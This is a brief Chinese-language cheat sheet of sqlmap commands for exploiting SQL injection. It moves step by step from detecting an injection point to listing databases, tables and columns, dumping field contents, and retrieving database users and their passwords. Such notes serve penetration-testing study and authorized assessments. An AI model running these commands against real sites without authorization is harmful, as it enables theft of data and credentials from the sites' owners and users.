判断是否存在注入

• sqlmap -u url

当注入点后面的参数大于等于两个时，url需要加双引号
查询当前用户下的所有数据库

• sqlmap -u url –-dbs

用于查询当前用户下的所有数据库，前提是当前用户有权限读取包含所有数据库列表信息的表
获取数据库中的表名

• sqlmap -u url -D 数据库名 –-tables

-D是指定某一个具体的数据库，如果没有指定，则会列出数据库中所有的库的表
获取表中的字段名

• sqlmap -u URL -D 数据库名 -T 表名 –-columns

获取字段内容

• sqlmap -u URL -D 数据库名 -T 表名 -C 字段名1,字段名2 –-dump

获取数据库的所有用户

• sqlmap -u URL –-users

前提是当前用户有权限读取包含所有用户的表的权限
获取数据库用户的密码

• sqlmap -u url –passwords

列出数据库用户的密码，前提是当前用户有读取包含用户密码的权限
获取当前网站数据库的名称

• sqlmap -u URL –-current-db

获取当前网站数据库的用户名称

• sqlmap -u URL –-current-user